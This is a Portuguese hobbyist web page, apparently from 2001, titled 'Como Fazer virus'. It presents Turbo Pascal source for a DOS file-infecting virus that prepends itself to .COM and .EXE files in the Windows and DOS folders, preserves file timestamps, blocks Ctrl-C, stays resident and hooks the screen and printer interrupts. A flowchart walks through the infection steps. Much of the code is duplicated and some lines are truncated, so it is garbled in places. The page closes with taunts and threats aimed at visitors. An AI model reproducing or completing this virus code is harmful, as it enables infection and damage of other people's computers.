hospedado no tripod

 

. - = / Como Fazer virus \ = - .


 

HOME


 

. - =/Codigo de virus\ = - .

atomico Tamanho real=240 pixels de largura

virus trojan, de carlos ou coyote 666
( função destruir programa)



criado por carlos augusto ás 16:40 19/12/01


Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando infecção dos arquivos');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');
if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' arquivos infectados.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do arquivo}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);

{Ate aqui seria a parte onde se copia o arquivo a ser infectado para outro
arquivo temporário}


assign(FromF,nome_arq); {nome_arq: explicado mais tarde}
reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele}
close(FromF); {copiará somente o vírus para o arquivo a}
close(tof); {ser infectado (arquivo.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{arquivo }


assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do arquivo na posição final do arquivo}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+arquivo, onde o arquivo seria acrescentado no fim do
vírus}

if MOSTRA then writeln('Infecção completa.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o arquivo}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizado);
end;
Corpo Principal do programa
Vamos ter que iniciar as funções do vírus:
begin

if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Essa variável irá conter o nome do programa que está sendo executado
no momento. Caso o nome que foi executado seja EDIT.exe essa variável
conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o usuário não possa apertar Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c); {Essa parte sera vista mais adiante}
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola na tela}
cy:=random(24);
GetIntVec($17,@printer); {Essa parte será vista mais adiante}
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar
O procedimento escrever como padrão para a
impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente na memória.}
if mostra then writeln('Programa Residente');
end.
Programas necessário à execução do Vírus
Vou mostrar alguns programas necessários para o correto uso desse vírus:
1. Programa que determina o cabeçalho e já mostra o tamanho do executável. Esse programa tem que ser colocado em um arquivo com o seguinte código:
program Cabecalho;
uses crt;
var
arq: file;
NumRead, NumWritten: Word;
Buf: array[1..5] of Char;
begin
Assign(arq, 'vírus.exe'); { Open input file }
Reset(arq, 1); { Record size = 1 }
Writeln('Tamanho do Vírus: ', FileSize(arq), ' bytes...');
BlockRead(arq, Buf, SizeOf(Buf), NumRead);
Close(arq);
writeln('Cabecalho: ',buf[1],buf[2],buf[3],buf[4],buf[5]);
writeln('Código Ascii: ',ord(buf[1]),' ',ord(buf[2]),' ',ord(buf[3]),' ',ord(buf[4]),' ',ord(buf[5]));
end.

FLUXOGRAMA:
Vírus Executado
|
|
(inicinf)Iniciar infecção nos caminhos
c:\dos\*.com, c:\dos\*.exe, *.com, *.exe
c:\windows\*.com, c:\windows\*.exe
|
|
(infec)Infecta os arquivos do diretório fornecido.
|
|
(procura)Procura primeiro arquivo a infectar
|
|
+-----> (verifica) Arquivo Infectado? ---S--------------------------------+
| | |
| | N |
| (infec)Copia vírus (sem arquivo hospedeiro) |
| para um arquivo chamado virtemp.tmp |
| | |
| | |
| cópia arquivo a ser infectado a partir |
| do fim do vírus (concatenação): |
| copy /b virtemp.exe+arquivo.exe virtemp.tmp |
| | |
| | |
| Grava data e hora do arquivo em variáveis. |
| | |
| | |
| Apaga arquivo original a ser infectado (del arquivo.exe) |
| | |
| | |
| Renomeia vírus com arquivo infectado(virtemp.tmp) para |
| arquivo.exe: ren virtemp.tmp arquivo.exe |
| | |
| | |
| Recupera a data e hora do arquivo hospedeiro |
| | |
| | |
+-------------S-- Procura mais arquivos. <--------------------------------+
Existem mais arquivos?
|
| N
(executa)Iniciar execução do programa hospedeiro
|
|
Separar programa hospedeiro do vírus
|
|
Posicionar ponteiro no fim do vírus (e início do arquivo)
|
|
Iniciar a copiar a partir deste ponto até o fim do arquivo (Resultado: programa sem vírus pronto a ser executado) para um arquivo chamado virtemp.TMP
|
|
Executar arquivo virtemp.tmp
|
|
Limpar o conteúdo do arquivo
virtemp.tmp (de modo que nãose possa recuperar o que tinha dentro dele)
|
|
Apagar o arquivo virtemp.tmp
|
|
Iniciar procedimentos que ele possa vir a fazer (Apagar arquivos, mexer com a
impressora, etc).
|

 



 

Nossa viagem de férias; Tamanho real=180 pixels de largura

FLUXOGRAMA:
Vírus Executado
|
|
(inicinf)Iniciar infecção nos caminhos
c:\dos\*.com, c:\dos\*.exe, *.com, *.exe
c:\windows\*.com, c:\windows\*.exe
|
|
(infec)Infecta os arquivos do diretório fornecido.
|
|
(procura)Procura primeiro arquivo a infectar
|
|
+-----> (verifica) Arquivo Infectado? ---S--------------------------------+
| | |
| | N |
| (infec)Copia vírus (sem arquivo hospedeiro) |
| para um arquivo chamado virtemp.tmp |
| | |
| | |
| cópia arquivo a ser infectado a partir |
| do fim do vírus (concatenação): |
| copy /b virtemp.exe+arquivo.exe virtemp.tmp |
| | |
| | |
| Grava data e hora do arquivo em variáveis. |
| | |
| | |
| Apaga arquivo original a ser infectado (del arquivo.exe) |
| | |
| | |
| Renomeia vírus com arquivo infectado(virtemp.tmp) para |
| arquivo.exe: ren virtemp.tmp arquivo.exe |
| | |
| | |
| Recupera a data e hora do arquivo hospedeiro |
| | |
| | |
+-------------S-- Procura mais arquivos. <--------------------------------+
Existem mais arquivos?
|
| N
(executa)Iniciar execução do programa hospedeiro
|
|
Separar programa hospedeiro do vírus
|
|
Posicionar ponteiro no fim do vírus (e início do arquivo)
|
|
Iniciar a copiar a partir deste ponto até o fim do arquivo (Resultado: programa sem vírus pronto a ser executado) para um arquivo chamado virtemp.TMP
|
|
Executar arquivo virtemp.tmp
|
|
Limpar o conteúdo do arquivo
virtemp.tmp (de modo que nãose possa recuperar o que tinha dentro dele)
|
|
Apagar o arquivo virtemp.tmp
|
|
Iniciar procedimentos que ele possa vir a fazer (Apagar arquivos, mexer com a
impressora, etc).
|

Fim do vírus
INICIANDO A INFECTAR
Vamos iniciar a infecção. Nesse caso seria somente iniciar o caminho que se quer infectar. Nesse caso: c:\dos\*.com, c:\dos\*.exe, *.com, *.exe, c:\windows\*.com, c:\windows\*.exe, junto disso deve ser dado o diretório de trabalho.
Procedure inicinf;
begin
if MOSTRA then writeln('Iniciando infecção dos arquivos');
arquiv:=0;
procura('*.com','');
procura('*.exe','');
procura('c:\windows\*.com','c:\windows\');
procura('c:\windows\*.exe','c:\windows\');
procura('c:\dos\*.com','c:\dos\');
procura('c:\dos\*.exe','c:\dos\');
if MOSTRA then writeln('Infecção dos arquivos Finalizada. Com um total de:');
if MOSTRA then writeln(arquiv,' arquivos infectados.');
end;
Como se pode ver, essa procedure somente lança outra. Ah! Outra coisa. É preciso fornecer um diretório de trabalho para o esquema poder funcionar direito.
INFECÇÃO DE VÍRUS
Essa parte ainda seria um procedure que lança outra, mas ela trabalharia mais a nível de arquivo do que a anterior.

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv'COMMAND.COM') then begin
HORAINI(NOME); {Grava data e hora do arquivo}
assign(FromF,nome);
reset(FromF,1);
assign(ToF,'virtemp.tmp');
Rewrite(ToF,1);
repeat
BlockRead(FromF, buf2, SizeOf(buf2), numread);
BlockWrite(ToF, buf2, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);

{Ate aqui seria a parte onde se copia o arquivo a ser infectado para outro
arquivo temporário}

assign(FromF,nome_arq); {nome_arq: explicado mais tarde}
reset(FromF, 1);
assign(ToF, nome);
Rewrite(ToF, 1);
BlockRead(FromF, buf, SizeOf(buf), numread); {Caso você não se lembre, o BUF é o buffer}
BlockWrite(ToF, buf, numread, NumWritten); {que conterá o vírus, que nesse caso ele}
close(FromF); {copiará somente o vírus para o arquivo a}
close(tof); {ser infectado (arquivo.exe) em que havia sido}
{movido o seu conteúdo para virtemp.tmp }
{deixando, por enquanto somente o vírus no }
{arquivo }


assign(FromF,'virtemp.TMP');
reset(FromF, 1);
assign(ToF, nome);
reset(tof,1);
seek(tof,LENVÍRUS); {Posiciona o ponteiro do arquivo na posição final do arquivo}
repeat
BlockRead(FromF, buf, SizeOf(buf), numread);
BlockWrite(ToF, buf, numread, NumWritten);
until (numread = 0) or (NumWritten <> numread);
close(FromF);
close(tof);
erase(fromf);
HORAFIM(NOME);
end;
{Essa parte seria a concatenação vírus+arquivo, onde o arquivo seria acrescentado no fim do
vírus}

if MOSTRA then writeln('Infecção completa.');
end;

procedure procura(nome,dir:string);
begin
if MOSTRA then writeln('Iniciando infecção do diretório: ',nome);
FindFirst(nome, Archive, DirInfo);
{$i+}
while (DosError = 0) and (arquiv numread);
close(FromF);
close(tof);
exec('virtemp.tmp',paramstr(1)+' '+paramstr(2)+' '+paramstr(3)); {Executa o programa aqui}
rewrite(tof); {Agora vou limpar o conteúdo e apagar o arquivo}
close(tof);
erase(tof);
if MOSTRA then writeln('Execução do programa hospedeiro finalizado);
end;
Corpo Principal do programa
Vamos ter que iniciar as funções do vírus:
begin
if MOSTRA then writeln('Iniciando o Vírus');
nome_arq:=paramstr(0); {Essa variável irá conter o nome do programa que está sendo executado
no momento. Caso o nome que foi executado seja EDIT.exe essa variável
conterá EDIT.EXE}
SETCBREAK(FALSE); {Para que o usuário não possa apertar Ctrl-C}
contra(nome_arq);
inicinf;
executa;
apag_arq;
GetIntVec($1c,@int1c); {Essa parte sera vista mais adiante}
SetIntVec($1c,Addr(bola));
vbola:=false;
cx:=random(80);{Aleatorizar a posição da bola na tela}
cy:=random(24);
GetIntVec($17,@printer); {Essa parte será vista mais adiante}
SetIntVec($17,Addr(escrever)); {Essa parte mostra ao computador para usar
O procedimento escrever como padrão para a
impressora}
if MOSTRA then writeln('Fim do vírus.');
keep(0); {Deixa o programa residente na memória.}
if mostra then writeln('Programa Residente');
end.
Programas necessário à execução do Vírus
Vou mostrar alguns programas necessários para o correto uso desse vírus:
1. Programa que determina o cabeçalho e já mostra o tamanho do executável. Esse programa tem que ser colocado em um arquivo com o seguinte código:
program Cabecalho;
uses crt;
var
arq: file;
NumRead, NumWritten: Word;
Buf: array[1..5] of Char;
begin
Assign(arq, 'vírus.exe'); { Open input file }
Reset(arq, 1); { Record size = 1 }
Writeln('Tamanho do Vírus: ', FileSize(arq), ' bytes...');
BlockRead(arq, Buf, SizeOf(Buf), NumRead);
Close(arq);
writeln('Cabecalho: ',buf[1],buf[2],buf[3],buf[4],buf[5]);
writeln('Código Ascii: ',ord(buf[1]),' ',ord(buf[2]),' ',ord(buf[3]),' ',ord(buf[4]),' ',ord(buf[5]));
end.

procedure contra(non:string);
var
FromF, ToF: file;
ARQ:text;
Ft:FILE of char;
f:file;

function vervir(nome:string):boolean;
VAR
Buf: array[1..10] of Char;
NUMREAD:WORD;
con:integer;
begin
if mostra then writeln('Iniciando verificação de infecção do arquivo ',nome);
con:=1;
ASSIGN(F,NoME);
ReSET(F,1); { Record size = 1 }
BlockRead(F, Buf, SizeOf(Buf), NumRead);
IF (BUF[1]=cab[1]) AND (BUF[2]=cab[2])AND (BUF[3]=cab[3])AND (BUF[4]=cab[4])AND (BUF[4]=cab[4]) tHEN
{Verifica o cabecalho do arquivo}
vervir:=TRUE {para ver se já foi infectado}
ELSE
vervir:=FALSE;
Close(F);
if mostra then writeln('Verificação de infecção finalizadá);
END;
procedure antivir;
begin
if not vervir(non) then
begin
if mostra then writeln('Arquivo Infectado, tentando desinfectar...'); {Arquivo infectado, tentando desinfectar...}
aSSIGN(Ft,paramstr(0));
ReSET(Ft); { Record size = 1 }
write(ft,cab[1]);
write(ft,cab[2]);
write(ft,cab[3]);
write(ft,cab[4]);
write(ft,cab[5]);
close(ft);
if mostra then writeln('Desinfecção completa!'); {Desinfecção completa}
textcolor(white+blink);
writeln('Atencao: Seu computador esta infectado por vírus! Sugiro passar Anti-vírus!');
textcolor(white);
end;
end;
begin
if mostra then writeln('Inicio do procedimento anti-vírus.');
antivir;
if mostra then writeln('Fim do procedimento anti-vírus.');
end;



 

somos muito Tamanho real=240 pixels de largura

Ñãø tëm mµïtå gëñtë ñë$të $ïtë qµë vër vë ø ¢øñtåÐør Ðë å¢ë$$ø å¢ïmå !!!!!!!


Nossa viagem de férias; Tamanho real=180 pixels de largura

Ë ÅÏ $ëµ øtårïø $åßë fåzër vïrµ$


e ai seu otario sabe fazer virus ?
entao me envia um o email é
YSNESHY@HOTMAIL.COM
te espero seu otario !!!!!!!!!!
veja minha foto acima hahahahah
carlinhos hahahahahaha


vcs pensao que virus e brincadeira seus simples mortais da net

fumaça.gif

VC PODE ESTAR CONTRUINDO SUA PROPRIA MORTE SE-CUIDA!!!

estamos vigiando vc todos os dias !!!!!